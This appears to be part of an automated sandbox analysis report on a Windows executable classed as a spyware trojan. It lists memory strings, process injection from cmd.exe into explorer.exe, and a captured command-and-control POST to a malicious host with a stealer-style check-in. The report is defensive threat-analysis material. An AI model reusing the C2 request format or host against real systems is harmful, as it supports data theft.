            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stackoverflow.com/a/5501711/3561
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://t2.symcb.com0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crl0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tl.symcb.com/tl.crt0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tl.symcd.com0&
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc3492#section-3.4
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wiki.commonjs.org/wiki/Unit_Testing/1.0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_is_a_half-closed_filedescriptor.3F
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecma-international.org/publications/standards/Ecma-262.htm)
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003530000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004F74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
            Source: lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.squid-cache.org/Doc/config/half_closed_clients/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.freshaddress.biz/js/lib/freshaddress-client-7.0.min.js?token=6075cbbd36a1f0f92cddb595415
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/luminateExtend/1.8.3/luminateExtend.min.js
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://codereview.chromium.org/121173009/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fca7603378a4e3ebeab2-4e03b1ac88f27f7b20b4cf232f717383.ssl.cf1.rackcdn.com/photos/social/land
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/antirez/linenoise
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/readable-stream/issues/16
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/1707
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/1726
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/2631
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://groups.google.com/forum/?pli=1#
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/2lsHcHC.png
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.0000000000600000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/2lsHcHC.png;https://i.ibb.co/93gBLW7/1552130165.png
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.imgur.com/2lsHcHC.pnge
            Source: explorer.exe, 00000013.00000002.455198443.00000000032E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rustih.ru/wp-content/uploads/2015/
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283386134.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000000.211932349.00000001403D8000.00000002.00000001.01000000.00000003.sdmp, lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwf.org
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwf.org/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000001.00000002.371915402.000000000392C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455393439.0000000004FBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/03
            Source: explorer.exe, 00000013.00000002.455198443.0000000003388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: explorer.exe, 00000013.00000003.373258728.0000000005CE0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
            Source: explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=.net
            Source: explorer.exe, 00000013.00000002.455599716.0000000005CAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.455599716.0000000005C86000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.n
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/cps0/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282190227.0000000003327000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.thawte.com/repository0
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.281956590.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/about/
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/about/contact
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/about/history
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282113949.00000000028DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/c
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/experts
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/leaders
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217524808.00000000005FB000.00000004.00000020.00020000.00000000.sdmp, lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/pages/
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/pages/our-values
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/pages/privacy-policy
            Source: lJ2eYRm0Bd.exe, 00000000.00000003.217411004.000000000293E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/pages/state-disclosures
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282059404.0000000002125000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.worldwildlife.org/stories
            Source: unknownHTTP traffic detected: POST /c2conf HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: coolworkss.xyzContent-Length: 36Cache-Control: no-cacheData Raw: 6c 69 64 3d 69 4f 71 70 49 71 2d 2d 50 65 74 74 65 72 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: lid=iOqpIq--Petter&j=default&ver=4.0
            Source: unknownDNS traffic detected: queries for: wwf.org
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008BC95C InternetCloseHandle,InternetOpenW,_strlen,HttpSendRequestA,HttpOpenRequestW,GetModuleHandleW,InternetReadFile,InternetQueryDataAvailable,InternetConnectA,InternetQueryDataAvailable,19_2_008BC95C
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveHost: wwf.org
            Source: global trafficHTTP traffic detected: GET /?utm_campaign=301-redirects&utm_source=wwf.org&utm_medium=referral&utm_content=wwf.org HTTP/1.1Connection: Keep-AliveHost: www.worldwildlife.org
            Source: global trafficHTTP traffic detected: GET /2lsHcHC.png HTTP/1.1Connection: Keep-AliveHost: i.imgur.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: coolworkss.xyz
            Source: unknownHTTPS traffic detected: 104.18.6.142:443 -> 192.168.2.4:49717 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.18.6.94:443 -> 192.168.2.4:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 199.232.32.193:443 -> 192.168.2.4:49719 version: TLS 1.2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008AF8C019_2_008AF8C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008AD8F019_2_008AD8F0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008BC95C19_2_008BC95C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00892ABC19_2_00892ABC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A9A5619_2_008A9A56
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089A30C19_2_0089A30C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00893CBF19_2_00893CBF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B6C3819_2_008B6C38
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B15E819_2_008B15E8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B8E9419_2_008B8E94
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089C7DB19_2_0089C7DB
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A108C19_2_008A108C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008948AC19_2_008948AC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008CF0C019_2_008CF0C0
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C78EF19_2_008C78EF
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008DD85019_2_008DD850
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C51D419_2_008C51D4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A415D19_2_008A415D
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008BF15219_2_008BF152
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008AA2C219_2_008AA2C2
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008CFA1B19_2_008CFA1B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A639319_2_008A6393
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008ACBED19_2_008ACBED
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008B630319_2_008B6303
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089DB7019_2_0089DB70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089849219_2_00898492
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C84B319_2_008C84B3
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C1C7019_2_008C1C70
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A2D8319_2_008A2D83
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A459319_2_008A4593
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008D55B419_2_008D55B4
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A05D819_2_008A05D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A75F919_2_008A75F9
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008BED1719_2_008BED17
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008AED3B19_2_008AED3B
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008E2D3A19_2_008E2D3A
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008ABD5319_2_008ABD53
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008C5E9419_2_008C5E94
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008AAEF819_2_008AAEF8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A274C19_2_008A274C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008A374019_2_008A3740
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089FF6C19_2_0089FF6C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 008C1530 appears 45 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 008965E6 appears 38 times
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_008998EC NtCreateFile,lstrlenW,lstrlenW,19_2_008998EC
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0089A30C lstrlenW,lstrcmpW,lstrcmpW,lstrcmpW,NtCreateFile,NtQueryDirectoryFile,lstrlenW,lstrlenW,lstrlenW,lstrcmpW,lstrcmpW,19_2_0089A30C
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_00899F88 NtReadFile,19_2_00899F88
            Source: lJ2eYRm0Bd.exeBinary or memory string: OriginalFilename vs lJ2eYRm0Bd.exe
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.283531068.0000000140627000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamenode.exe* vs lJ2eYRm0Bd.exe
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282826399.0000000003628000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezip.exe( vs lJ2eYRm0Bd.exe
            Source: lJ2eYRm0Bd.exe, 00000000.00000002.282901842.0000000003B3D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs lJ2eYRm0Bd.exe
            Source: lJ2eYRm0Bd.exeStatic PE information: invalid certificate
            Source: lJ2eYRm0Bd.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeFile read: C:\Users\user\Desktop\lJ2eYRm0Bd.exeJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\lJ2eYRm0Bd.exe C:\Users\user\Desktop\lJ2eYRm0Bd.exe
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeFile created: C:\Users\user\AppData\Roaming\LVMKGWHFJJump to behavior
            Source: C:\Users\user\Desktop\lJ2eYRm0Bd.exeFile created: C:\Users\user\AppData\Local\Temp\c12f9ea1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/3@40/5
